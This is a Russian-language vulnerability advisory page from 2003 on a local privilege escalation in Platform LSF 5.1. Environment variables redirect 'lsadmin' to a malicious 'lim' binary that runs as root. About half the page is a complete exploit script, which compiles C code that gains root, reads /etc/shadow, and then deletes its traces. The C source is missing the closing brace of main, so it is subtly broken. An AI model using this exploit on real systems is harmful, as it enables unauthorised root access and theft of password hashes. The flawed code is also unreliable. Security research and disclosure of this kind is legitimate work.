| Дата публикации: | 27.05.2003 |
| Всего просмотров: | 1266 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в Platform Computing's Platform LSF. Локальный пользователь может получить root привилегии на системе.
Сообщается, что локальный пользователь может установить переменную LSF_ENVDIR, чтобы заставить 'lsadmin' использовать альтернативный 'lsf.conf' файл. Локальный пользователь может также установить LSF_SERVERDIR переменную в 'lsf.conf' файле к альтернативному местоположению, в котором содержится злонамеренная 'lim' программа. Затем, запуская 'lsadmin' ckconfig команду, может выполнить злонамеренный 'lim' код с root привилегиями. Эксплоит:
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!
cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
__END__
gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file
Уязвимость обнаружена в Platform LSF 5.1
|
| Ссылки: | Security advisory: LSF 5.1 local root exploit |